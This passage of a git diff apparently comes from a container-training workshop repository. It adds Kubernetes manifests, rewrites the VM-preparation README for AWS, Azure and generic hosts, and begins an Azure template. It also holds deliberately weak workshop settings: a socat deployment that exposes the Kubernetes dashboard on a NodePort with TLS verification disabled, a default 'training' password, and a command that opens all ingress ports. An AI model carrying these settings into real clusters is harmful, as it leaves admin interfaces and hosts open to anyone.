apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: psp:restricted
|
||||
rules:
|
||||
- apiGroups: ['policy']
|
||||
resources: ['podsecuritypolicies']
|
||||
verbs: ['use']
|
||||
resourceNames: ['restricted']
|
||||
|
||||
15
k8s/registry.yaml
Normal file
15
k8s/registry.yaml
Normal file
@@ -0,0 +1,15 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: registry
|
||||
spec:
|
||||
containers:
|
||||
- name: registry
|
||||
image: registry
|
||||
env:
|
||||
- name: REGISTRY_HTTP_ADDR
|
||||
valueFrom:
|
||||
configMapKeyRef:
|
||||
name: registry
|
||||
key: http.addr
|
||||
|
||||
67
k8s/socat.yaml
Normal file
67
k8s/socat.yaml
Normal file
@@ -0,0 +1,67 @@
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
annotations:
|
||||
deployment.kubernetes.io/revision: "2"
|
||||
creationTimestamp: null
|
||||
generation: 1
|
||||
labels:
|
||||
app: socat
|
||||
name: socat
|
||||
namespace: kube-system
|
||||
selfLink: /apis/extensions/v1beta1/namespaces/kube-system/deployments/socat
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: socat
|
||||
strategy:
|
||||
rollingUpdate:
|
||||
maxSurge: 1
|
||||
maxUnavailable: 1
|
||||
type: RollingUpdate
|
||||
template:
|
||||
metadata:
|
||||
creationTimestamp: null
|
||||
labels:
|
||||
app: socat
|
||||
spec:
|
||||
containers:
|
||||
- args:
|
||||
- sh
|
||||
- -c
|
||||
- apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard:443,verify=0
|
||||
image: alpine
|
||||
imagePullPolicy: Always
|
||||
name: socat
|
||||
resources: {}
|
||||
terminationMessagePath: /dev/termination-log
|
||||
terminationMessagePolicy: File
|
||||
dnsPolicy: ClusterFirst
|
||||
restartPolicy: Always
|
||||
schedulerName: default-scheduler
|
||||
securityContext: {}
|
||||
terminationGracePeriodSeconds: 30
|
||||
status: {}
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
creationTimestamp: null
|
||||
labels:
|
||||
app: socat
|
||||
name: socat
|
||||
namespace: kube-system
|
||||
selfLink: /api/v1/namespaces/kube-system/services/socat
|
||||
spec:
|
||||
externalTrafficPolicy: Cluster
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: socat
|
||||
sessionAffinity: None
|
||||
type: NodePort
|
||||
status:
|
||||
loadBalancer: {}
|
||||
11
k8s/storage-class.yaml
Normal file
11
k8s/storage-class.yaml
Normal file
@@ -0,0 +1,11 @@
|
||||
kind: StorageClass
|
||||
apiVersion: storage.k8s.io/v1beta1
|
||||
metadata:
|
||||
name: portworx-replicated
|
||||
annotations:
|
||||
storageclass.kubernetes.io/is-default-class: "true"
|
||||
provisioner: kubernetes.io/portworx-volume
|
||||
parameters:
|
||||
repl: "2"
|
||||
priority_io: "high"
|
||||
|
||||
103
k8s/traefik.yaml
Normal file
103
k8s/traefik.yaml
Normal file
@@ -0,0 +1,103 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
---
|
||||
kind: DaemonSet
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: traefik-ingress-lb
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: traefik-ingress-lb
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: traefik-ingress-lb
|
||||
name: traefik-ingress-lb
|
||||
spec:
|
||||
tolerations:
|
||||
- effect: NoSchedule
|
||||
operator: Exists
|
||||
hostNetwork: true
|
||||
serviceAccountName: traefik-ingress-controller
|
||||
terminationGracePeriodSeconds: 60
|
||||
containers:
|
||||
- image: traefik:1.7
|
||||
name: traefik-ingress-lb
|
||||
ports:
|
||||
- name: http
|
||||
containerPort: 80
|
||||
hostPort: 80
|
||||
- name: admin
|
||||
containerPort: 8080
|
||||
hostPort: 8080
|
||||
securityContext:
|
||||
capabilities:
|
||||
drop:
|
||||
- ALL
|
||||
add:
|
||||
- NET_BIND_SERVICE
|
||||
args:
|
||||
- --api
|
||||
- --kubernetes
|
||||
- --logLevel=INFO
|
||||
---
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
name: traefik-ingress-service
|
||||
namespace: kube-system
|
||||
spec:
|
||||
selector:
|
||||
k8s-app: traefik-ingress-lb
|
||||
ports:
|
||||
- protocol: TCP
|
||||
port: 80
|
||||
name: web
|
||||
- protocol: TCP
|
||||
port: 8080
|
||||
name: admin
|
||||
---
|
||||
kind: ClusterRole
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
rules:
|
||||
- apiGroups:
|
||||
- ""
|
||||
resources:
|
||||
- services
|
||||
- endpoints
|
||||
- secrets
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
- apiGroups:
|
||||
- extensions
|
||||
resources:
|
||||
- ingresses
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
---
|
||||
kind: ClusterRoleBinding
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
metadata:
|
||||
name: traefik-ingress-controller
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: traefik-ingress-controller
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: traefik-ingress-controller
|
||||
namespace: kube-system
|
||||
33
k8s/users:jean.doe.yaml
Normal file
33
k8s/users:jean.doe.yaml
Normal file
@@ -0,0 +1,33 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: jean.doe
|
||||
namespace: users
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: users:jean.doe
|
||||
rules:
|
||||
- apiGroups: [ certificates.k8s.io ]
|
||||
resources: [ certificatesigningrequests ]
|
||||
verbs: [ create ]
|
||||
- apiGroups: [ certificates.k8s.io ]
|
||||
resourceNames: [ users:jean.doe ]
|
||||
resources: [ certificatesigningrequests ]
|
||||
verbs: [ get, create, delete, watch ]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: users:jean.doe
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: users:jean.doe
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: jean.doe
|
||||
namespace: users
|
||||
|
||||
70
k8s/volumes-for-consul.yaml
Normal file
70
k8s/volumes-for-consul.yaml
Normal file
@@ -0,0 +1,70 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node2
|
||||
annotations:
|
||||
node: node2
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node2
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node3
|
||||
annotations:
|
||||
node: node3
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node3
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node4
|
||||
annotations:
|
||||
node: node4
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node4
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
[build]
|
||||
base = "docs"
|
||||
publish = "docs"
|
||||
base = "slides"
|
||||
publish = "slides"
|
||||
command = "./build.sh once"
|
||||
|
||||
|
||||
@@ -7,9 +7,9 @@ workshop.
|
||||
|
||||
|
||||
## 1. Prerequisites
|
||||
|
||||
Virtualbox, Vagrant and Ansible
|
||||
|
||||
|
||||
- Virtualbox: https://www.virtualbox.org/wiki/Downloads
|
||||
|
||||
- Vagrant: https://www.vagrantup.com/downloads.html
|
||||
@@ -25,19 +25,20 @@ Virtualbox, Vagrant and Ansible
|
||||
|
||||
$ git clone --recursive https://github.com/ansible/ansible.git
|
||||
$ cd ansible
|
||||
$ git checkout stable-2.0.0.1
|
||||
$ git checkout stable-{{ getStableVersionFromAnsibleProject }}
|
||||
$ git submodule update
|
||||
|
||||
- source the setup script to make Ansible available on this terminal session:
|
||||
|
||||
$ source path/to/your-ansible-clone/hacking/env-setup
|
||||
|
||||
- you need to repeat the last step everytime you open a new terminal session
|
||||
- you need to repeat the last step every time you open a new terminal session
|
||||
and want to use any Ansible command (but you'll probably only need to run
|
||||
it once).
|
||||
|
||||
|
||||
## 2. Preparing the environment
|
||||
Change into directory that has your Vagrantfile
|
||||
|
||||
Run the following commands:
|
||||
|
||||
@@ -66,6 +67,14 @@ will reflect inside the instance.
|
||||
|
||||
- Depending on the Vagrant version, `sudo apt-get install bsdtar` may be needed
|
||||
|
||||
- If you get an error like "no Vagrant file found" or you have a file but "cannot open base box" when running `vagrant up`,
|
||||
chances are good you not in the correct directory.
|
||||
Make sure you are in sub directory named "prepare-local". It has all the config files required by ansible, vagrant and virtualbox
|
||||
|
||||
- If you are using Python 3.7, running the ansible-playbook provisioning, see an error like "SyntaxError: invalid syntax" and it mentions
|
||||
the word "async", you need to upgrade your Ansible version to 2.6 or higher to resolve the keyword conflict.
|
||||
https://github.com/ansible/ansible/issues/42105
|
||||
|
||||
- If you get strange Ansible errors about dependencies, try to check your pip
|
||||
version with `pip --version`. The current version is 8.1.1. If your pip is
|
||||
older than this, upgrade it with `sudo pip install --upgrade pip`, restart
|
||||
|
||||
@@ -1,26 +1,53 @@
|
||||
# Trainer tools to create and prepare VMs for Docker workshops on AWS
|
||||
# Trainer tools to create and prepare VMs for Docker workshops
|
||||
|
||||
These tools can help you to create VMs on:
|
||||
|
||||
- Azure
|
||||
- EC2
|
||||
- OpenStack
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- [Docker](https://docs.docker.com/engine/installation/)
|
||||
- [Docker Compose](https://docs.docker.com/compose/install/)
|
||||
- [Parallel SSH](https://code.google.com/archive/p/parallel-ssh/) (on a Mac: `brew install pssh`)
|
||||
|
||||
Depending on the infrastructure that you want to use, you also need to install
|
||||
the Azure CLI, the AWS CLI, or terraform (for OpenStack deployment).
|
||||
|
||||
And if you want to generate printable cards:
|
||||
|
||||
- [pyyaml](https://pypi.python.org/pypi/PyYAML)
|
||||
- [jinja2](https://pypi.python.org/pypi/Jinja2)
|
||||
|
||||
You can install them with pip (perhaps with `pip install --user`, or even use `virtualenv` if that's your thing).
|
||||
|
||||
These require Python 3. If you are on a Mac, see below for specific instructions on setting up
|
||||
Python 3 to be the default Python on a Mac. In particular, if you installed `mosh`, Homebrew
|
||||
may have changed your default Python to Python 2.
|
||||
|
||||
## General Workflow
|
||||
|
||||
- fork/clone repo
|
||||
- set required environment variables for AWS
|
||||
- create an infrastructure configuration in the `prepare-vms/infra` directory
|
||||
(using one of the example files in that directory)
|
||||
- create your own setting file from `settings/example.yaml`
|
||||
- run `./workshopctl` commands to create instances, install docker, setup each users environment in node1, other management tasks
|
||||
- run `./workshopctl cards` command to generate PDF for printing handouts of each users host IP's and login info
|
||||
- if necessary, increase allowed open files: `ulimit -Sn 10000`
|
||||
- run `./workshopctl start` to create instances
|
||||
- run `./workshopctl deploy` to install Docker and setup environment
|
||||
- run `./workshopctl kube` (if you want to install and setup Kubernetes)
|
||||
- run `./workshopctl cards` (if you want to generate PDF for printing handouts of each users host IP's and login info)
|
||||
- run `./workshopctl stop` at the end of the workshop to terminate instances
|
||||
|
||||
## Clone/Fork the Repo, and Build the Tools Image
|
||||
|
||||
The Docker Compose file here is used to build a image with all the dependencies to run the `./workshopctl` commands and optional tools. Each run of the script will check if you have those dependencies locally on your host, and will only use the container if you're [missing a dependency](workshopctl#L5).
|
||||
|
||||
$ git clone https://github.com/jpetazzo/orchestration-workshop.git
|
||||
$ cd orchestration-workshop/prepare-vms
|
||||
$ git clone https://github.com/jpetazzo/container.training
|
||||
$ cd container.training/prepare-vms
|
||||
$ docker-compose build
|
||||
|
||||
|
||||
## Preparing to Run `./workshopctl`
|
||||
|
||||
### Required AWS Permissions/Info
|
||||
@@ -29,40 +56,74 @@ The Docker Compose file here is used to build a image with all the dependencies
|
||||
- Using a non-default VPC or Security Group isn't supported out of box yet, so you will have to customize `lib/commands.sh` if you want to change that.
|
||||
- These instances will assign the default VPC Security Group, which does not open any ports from Internet by default. So you'll need to add Inbound rules for `SSH | TCP | 22 | 0.0.0.0/0` and `Custom TCP Rule | TCP | 8000 - 8002 | 0.0.0.0/0`, or run `./workshopctl opensg` which opens up all ports.
|
||||
|
||||
### Required Environment Variables
|
||||
### Create your `infra` file
|
||||
|
||||
- `AWS_ACCESS_KEY_ID`
|
||||
- `AWS_SECRET_ACCESS_KEY`
|
||||
- `AWS_DEFAULT_REGION`
|
||||
You need to do this only once. (On AWS, you can create one `infra`
|
||||
file per region.)
|
||||
|
||||
### Update/copy `settings/example.yaml`
|
||||
Make a copy of one of the example files in the `infra` directory.
|
||||
|
||||
Then pass `settings/YOUR_WORKSHOP_NAME-settings.yaml` as an argument to `./workshopctl deploy`, `./workshopctl cards`, etc.
|
||||
For instance:
|
||||
|
||||
./workshopctl cards 2016-09-28-00-33-bret settings/orchestration.yaml
|
||||
```bash
|
||||
cp infra/example.aws infra/aws-us-west-2
|
||||
```
|
||||
|
||||
Edit your infrastructure file to customize it.
|
||||
You will probably need to put your cloud provider credentials,
|
||||
select region...
|
||||
|
||||
If you don't have the `aws` CLI installed, you will get a warning that it's a missing dependency. If you're not using AWS you can ignore this.
|
||||
|
||||
### Create your `settings` file
|
||||
|
||||
Similarly, pick one of the files in `settings` and copy it
|
||||
to customize it.
|
||||
|
||||
For instance:
|
||||
|
||||
```bash
|
||||
cp settings/example.yaml settings/myworkshop.yaml
|
||||
```
|
||||
|
||||
You're all set!
|
||||
|
||||
## `./workshopctl` Usage
|
||||
|
||||
```
|
||||
workshopctl - the orchestration workshop swiss army knife
|
||||
Commands:
|
||||
ami Show the AMI that will be used for deployment
|
||||
amis List Ubuntu AMIs in the current region
|
||||
cards Generate ready-to-print cards for a batch of VMs
|
||||
deploy Install Docker on a bunch of running VMs
|
||||
ec2quotas Check our EC2 quotas (max instances)
|
||||
help Show available commands
|
||||
ids List the instance IDs belonging to a given tag or token
|
||||
ips List the IP addresses of the VMs for a given tag or token
|
||||
kube Setup kubernetes clusters with kubeadm (must be run AFTER deploy)
|
||||
list List available batches in the current region
|
||||
opensg Open the default security group to ALL ingress traffic
|
||||
pull_images Pre-pull a bunch of Docker images
|
||||
retag Apply a new tag to a batch of VMs
|
||||
start Start a batch of VMs
|
||||
status List instance status for a given batch
|
||||
stop Stop (terminate, shutdown, kill, remove, destroy...) instances
|
||||
test Run tests (pre-flight checks) on a batch of VMs
|
||||
build Build the Docker image to run this program in a container
|
||||
cards Generate ready-to-print cards for a group of VMs
|
||||
deploy Install Docker on a bunch of running VMs
|
||||
disableaddrchecks Disable source/destination IP address checks
|
||||
disabledocker Stop Docker Engine and don't restart it automatically
|
||||
helmprom Install Helm and Prometheus
|
||||
help Show available commands
|
||||
ids (FIXME) List the instance IDs belonging to a given tag or token
|
||||
kubebins Install Kubernetes and CNI binaries but don't start anything
|
||||
kubereset Wipe out Kubernetes configuration on all nodes
|
||||
kube Setup kubernetes clusters with kubeadm (must be run AFTER deploy)
|
||||
kubetest Check that all nodes are reporting as Ready
|
||||
listall List VMs running on all configured infrastructures
|
||||
list List available groups for a given infrastructure
|
||||
netfix Disable GRO and run a pinger job on the VMs
|
||||
opensg Open the default security group to ALL ingress traffic
|
||||
ping Ping VMs in a given tag, to check that they have network access
|
||||
pssh Run an arbitrary command on all nodes
|
||||
pull_images Pre-pull a bunch of Docker images
|
||||
quotas Check our infrastructure quotas (max instances)
|
||||
remap_nodeports Remap NodePort range to 10000-10999
|
||||
retag (FIXME) Apply a new tag to a group of VMs
|
||||
ssh Open an SSH session to the first node of a tag
|
||||
start Start a group of VMs
|
||||
stop Stop (terminate, shutdown, kill, remove, destroy...) instances
|
||||
tags List groups of VMs known locally
|
||||
test Run tests (pre-flight checks) on a group of VMs
|
||||
weavetest Check that weave seems properly setup
|
||||
webssh Install a WEB SSH server on the machines (port 1080)
|
||||
wrap Run this program in a container
|
||||
www Run a web server to access card HTML and PDF
|
||||
```
|
||||
|
||||
### Summary of What `./workshopctl` Does For You
|
||||
@@ -73,35 +134,78 @@ test Run tests (pre-flight checks) on a batch of VMs
|
||||
- The `./workshopctl` script can be executed directly.
|
||||
- It will run locally if all its dependencies are fulfilled; otherwise it will run in the Docker container you created with `docker-compose build` (preparevms_prepare-vms).
|
||||
- During `start` it will add your default local SSH key to all instances under the `ubuntu` user.
|
||||
- During `deploy` it will create the `docker` user with password `training`, which is printing on the cards for students. For now, this is hard coded.
|
||||
- During `deploy` it will create the `docker` user with password `training`, which is printing on the cards for students. This can be configured with the `docker_user_password` property in the settings file.
|
||||
|
||||
### Example Steps to Launch a Batch of Instances for a Workshop
|
||||
### Example Steps to Launch a group of AWS Instances for a Workshop
|
||||
|
||||
- Run `./workshopctl start N` Creates `N` EC2 instances
|
||||
- Run `./workshopctl start --infra infra/aws-us-east-2 --settings/myworkshop.yaml --count 60` to create 60 EC2 instances
|
||||
- Your local SSH key will be synced to instances under `ubuntu` user
|
||||
- AWS instances will be created and tagged based on date, and IP's stored in `prepare-vms/tags/`
|
||||
- Run `./workshopctl deploy TAG settings/somefile.yaml` to run `scripts/postprep.rc` via parallel-ssh
|
||||
- Run `./workshopctl deploy TAG` to run `lib/postprep.py` via parallel-ssh
|
||||
- If it errors or times out, you should be able to rerun
|
||||
- Requires good connection to run all the parallel SSH connections, up to 100 parallel (ProTip: create dedicated management instance in same AWS region where you run all these utils from)
|
||||
- Run `./workshopctl pull-images TAG` to pre-pull a bunch of Docker images to the instances
|
||||
- Run `./workshopctl cards TAG settings/somefile.yaml` generates PDF/HTML files to print and cut and hand out to students
|
||||
- Run `./workshopctl pull_images TAG` to pre-pull a bunch of Docker images to the instances
|
||||
- Run `./workshopctl cards TAG` generates PDF/HTML files to print and cut and hand out to students
|
||||
- *Have a great workshop*
|
||||
- Run `./workshopctl stop TAG` to terminate instances.
|
||||
|
||||
## Other Tools
|
||||
### Example Steps to Launch Azure Instances
|
||||
|
||||
### Deploying your SSH key to all the machines
|
||||
- Install the [Azure CLI](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest) and authenticate with a valid account (`az login`)
|
||||
- Customize `azuredeploy.parameters.json`
|
||||
- Required:
|
||||
- Provide the SSH public key you plan to use for instance configuration
|
||||
- Optional:
|
||||
- Choose a name for the workshop (default is "workshop")
|
||||
- Choose the number of instances (default is 3)
|
||||
- Customize the desired instance size (default is Standard_D1_v2)
|
||||
- Launch instances with your chosen resource group name and your preferred region; the examples are "workshop" and "eastus":
|
||||
```
|
||||
az group create --name workshop --location eastus
|
||||
az group deployment create --resource-group workshop --template-file azuredeploy.json --parameters @azuredeploy.parameters.json
|
||||
```
|
||||
|
||||
- Make sure that you have SSH keys loaded (`ssh-add -l`).
|
||||
- Source `rc`.
|
||||
- Run `pcopykey`.
|
||||
The `az group deployment create` command can take several minutes and will only say `- Running ..` until it completes, unless you increase the verbosity with `--verbose` or `--debug`.
|
||||
|
||||
To display the IPs of the instances you've launched:
|
||||
|
||||
### Installing extra packages
|
||||
```
|
||||
az vm list-ip-addresses --resource-group workshop --output table
|
||||
```
|
||||
|
||||
- Source `postprep.rc`.
|
||||
(This will install a few extra packages, add entries to
|
||||
/etc/hosts, generate SSH keys, and deploy them on all hosts.)
|
||||
If you want to put the IPs into `prepare-vms/tags/<tag>/ips.txt` for a tag of "myworkshop":
|
||||
|
||||
1) If you haven't yet installed `jq` and/or created your event's tags directory in `prepare-vms`:
|
||||
|
||||
```
|
||||
brew install jq
|
||||
mkdir -p tags/myworkshop
|
||||
```
|
||||
|
||||
2) And then generate the IP list:
|
||||
|
||||
```
|
||||
az vm list-ip-addresses --resource-group workshop --output json | jq -r '.[].virtualMachine.network.publicIpAddresses[].ipAddress' > tags/myworkshop/ips.txt
|
||||
```
|
||||
|
||||
After the workshop is over, remove the instances:
|
||||
|
||||
```
|
||||
az group delete --resource-group workshop
|
||||
```
|
||||
|
||||
### Example Steps to Configure Instances from a non-AWS Source
|
||||
|
||||
- Copy `infra/example.generic` to `infra/generic`
|
||||
- Run `./workshopctl start --infra infra/generic --settings settings/...yaml`
|
||||
- Note the `prepare-vms/tags/TAG/` path that has been auto-created.
|
||||
- Launch instances via your preferred method. You'll need to get the instance IPs and be able to SSH into them.
|
||||
- Edit the file `prepare-vms/tags/TAG/ips.txt`, it should list the IP addresses of the VMs (one per line, without any comments or other info)
|
||||
- Continue deployment of cluster configuration with `./workshopctl deploy TAG`
|
||||
- Optionally, configure Kubernetes clusters of the size in the settings: workshopctl kube `TAG`
|
||||
- Optionally, test your Kubernetes clusters. They may take a little time to become ready: workshopctl kubetest `TAG`
|
||||
- Generate cards to print and hand out: workshopctl cards `TAG`
|
||||
- Print the cards file: prepare-vms/tags/`TAG`/ips.html
|
||||
|
||||
|
||||
## Even More Details
|
||||
@@ -114,7 +218,7 @@ To see which local key will be uploaded, run `ssh-add -l | grep RSA`.
|
||||
|
||||
#### Instance + tag creation
|
||||
|
||||
10 VMs will be started, with an automatically generated tag (timestamp + your username).
|
||||
The VMs will be started, with an automatically generated tag (timestamp + your username).
|
||||
|
||||
Your SSH key will be added to the `authorized_keys` of the ubuntu user.
|
||||
|
||||
@@ -122,35 +226,33 @@ Your SSH key will be added to the `authorized_keys` of the ubuntu user.
|
||||
|
||||
Following the creation of the VMs, a text file will be created containing a list of their IPs.
|
||||
|
||||
This ips.txt file will be created in the $TAG/ directory and a symlink will be placed in the working directory of the script.
|
||||
|
||||
If you create new VMs, the symlinked file will be overwritten.
|
||||
|
||||
#### Deployment
|
||||
|
||||
Instances can be deployed manually using the `deploy` command:
|
||||
|
||||
$ ./workshopctl deploy TAG settings/somefile.yaml
|
||||
$ ./workshopctl deploy TAG
|
||||
|
||||
The `postprep.rc` file will be copied via parallel-ssh to all of the VMs and executed.
|
||||
The `postprep.py` file will be copied via parallel-ssh to all of the VMs and executed.
|
||||
|
||||
#### Pre-pull images
|
||||
|
||||
$ ./workshopctl pull-images TAG
|
||||
$ ./workshopctl pull_images TAG
|
||||
|
||||
#### Generate cards
|
||||
|
||||
$ ./workshopctl cards TAG settings/somefile.yaml
|
||||
$ ./workshopctl cards TAG
|
||||
|
||||
If you want to generate both HTML and PDF cards, install [wkhtmltopdf](https://wkhtmltopdf.org/downloads.html); without that installed, only HTML cards will be generated.
|
||||
|
||||
If you don't have `wkhtmltopdf` installed, you will get a warning that it is a missing dependency. If you plan to just print the HTML cards, you can ignore this.
|
||||
|
||||
#### List tags
|
||||
|
||||
$ ./workshopctl list
|
||||
$ ./workshopctl list infra/some-infra-file
|
||||
|
||||
#### List VMs
|
||||
$ ./workshopctl listall
|
||||
|
||||
$ ./workshopctl list TAG
|
||||
|
||||
This will print a human-friendly list containing some information about each instance.
|
||||
$ ./workshopctl tags
|
||||
|
||||
#### Stop and destroy VMs
|
||||
|
||||
@@ -160,3 +262,32 @@ This will print a human-friendly list containing some information about each ins
|
||||
|
||||
- Don't write to bash history in system() in postprep
|
||||
- compose, etc version inconsistent (int vs str)
|
||||
|
||||
## Making sure Python3 is the default (Mac only)
|
||||
|
||||
Check the `/usr/local/bin/python` symlink. It should be pointing to
|
||||
`/usr/local/Cellar/python/3`-something. If it isn't, follow these
|
||||
instructions.
|
||||
|
||||
1) Verify that Python 3 is installed.
|
||||
|
||||
```
|
||||
ls -la /usr/local/Cellar/Python
|
||||
```
|
||||
|
||||
You should see one or more versions of Python 3. If you don't,
|
||||
install it with `brew install python`.
|
||||
|
||||
2) Verify that `python` points to Python3.
|
||||
|
||||
```
|
||||
ls -la /usr/local/bin/python
|
||||
```
|
||||
|
||||
If this points to `/usr/local/Cellar/python@2`, then we'll need to change it.
|
||||
|
||||
```
|
||||
rm /usr/local/bin/python
|
||||
ln -s /usr/local/Cellar/Python/xxxx /usr/local/bin/python
|
||||
# where xxxx is the most recent Python 3 version you saw above
|
||||
```
|
||||
|
||||
250
prepare-vms/azuredeploy.json
Normal file
250
prepare-vms/azuredeploy.json
Normal file
@@ -0,0 +1,250 @@
|
||||
{
|
||||
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
|
||||
"contentVersion": "1.0.0.0",
|
||||
"parameters": {
|
||||
"workshopName": {
|
||||
"type": "string",
|
||||
"defaultValue": "workshop",
|
||||
"metadata": {
|
||||
"description": "Workshop name."
|
||||
}
|
||||
},
|
||||
"vmPrefix": {
|
||||
"type": "string",
|
||||
"defaultValue": "node",
|
||||
"metadata": {
|
||||
"description": "Prefix for VM names."
|
||||
}
|
||||
},
|
||||
"numberOfInstances": {
|
||||
"type": "int",
|
||||
"defaultValue": 3,
|
||||
"metadata": {
|
||||
"description": "Number of VMs to create."
|
||||
}
|
||||
},
|
||||
"adminUsername": {
|
||||
"type": "string",
|
||||
"defaultValue": "ubuntu",
|
||||
"metadata": {
|
||||
"description": "Admin username for VMs."
|
||||
}
|
||||
},
|
||||
"sshKeyData": {
|
||||
"type": "string",
|
||||
"defaultValue": "",
|
||||
"metadata": {
|
||||
"description": "SSH rsa public key file as a string."
|
||||
}
|
||||
},
|
||||
"imagePublisher": {
|
||||
"type": "string",
|
||||
"defaultValue": "Canonical",
|
||||
"metadata": {
|
||||
"description": "OS image publisher; default Canonical."
|
||||
}
|
||||
},
|
||||
"imageOffer": {
|
||||
"type": "string",
|
||||
"defaultValue": "UbuntuServer",
|
||||
"metadata": {
|
||||
"description": "The name of the image offer. The default is Ubuntu"
|
||||
}
|
||||
},
|
||||
"imageSKU": {
|
||||
"type": "string",
|
||||
"defaultValue": "16.04-LTS",
|
||||
"metadata": {
|
||||
"description": "Version of the image. The default is 16.04-LTS"
|
||||
}
|
||||
},
|
||||
"vmSize": {
|
||||
"type": "string",
|
||||
"defaultValue": "Standard_D1_v2",
|
||||
"metadata": {
|
||||
"description": "VM Size."
|
||||
}
|
||||
}
|
||||
},
|
||||
"variables": {
|
||||
"vnetID": "[resourceId('Microsoft.Network/virtualNetworks',variables('virtualNetworkName'))]",
|
||||
"subnet1Ref": "[concat(variables('vnetID'),'/subnets/',variables('subnet1Name'))]",
|
||||
"vmName": "[parameters('vmPrefix')]",
|
||||
"sshKeyPath": "[concat('/home/',parameters('adminUsername'),'/.ssh/authorized_keys')]",
|
||||
"publicIPAddressName": "PublicIP",
|
||||
"publicIPAddressType": "Dynamic",
|
||||
"virtualNetworkName": "MyVNET",
|
||||
"netSecurityGroup": "MyNSG",
|
||||
"addressPrefix": "10.0.0.0/16",
|
||||
"subnet1Name": "subnet-1",
|
||||
"subnet1Prefix": "10.0.0.0/24",
|
||||
"nicName": "myVMNic"
|
||||
},
|
||||
"resources": [
|
||||
{
|
||||
"apiVersion": "2017-11-01",
|
||||
"type": "Microsoft.Network/publicIPAddresses",
|
||||
"name": "[concat(variables('publicIPAddressName'),copyIndex(1))]",
|
||||
"location": "[resourceGroup().location]",
|
||||
"copy": {
|
||||
"name": "publicIPLoop",
|
||||
"count": "[parameters('numberOfInstances')]"
|
||||
},
|
||||
"properties": {
|
||||
"publicIPAllocationMethod": "[variables('publicIPAddressType')]"
|
||||
},
|
||||
"tags": {
|
||||
"workshop": "[parameters('workshopName')]"
|
||||
}
|
||||
},
|
||||
{
|
||||
"apiVersion": "2017-11-01",
|
||||
"type": "Microsoft.Network/virtualNetworks",
|
||||
"name": "[variables('virtualNetworkName')]",
|
||||
"location": "[resourceGroup().location]",
|
||||
"dependsOn": [
|
||||
"[concat('Microsoft.Network/networkSecurityGroups/', variables('netSecurityGroup'))]"
|
||||
],
|
||||
"properties": {
|
||||
"addressSpace": {
|
||||
"addressPrefixes": [
|
||||
"[variables('addressPrefix')]"
|
||||
]
|
||||
},
|
||||
"subnets": [
|
||||
{
|
||||
"name": "[variables('subnet1Name')]",
|
||||
"properties": {
|
||||
"addressPrefix": "[variables('subnet1Prefix')]",
|
||||
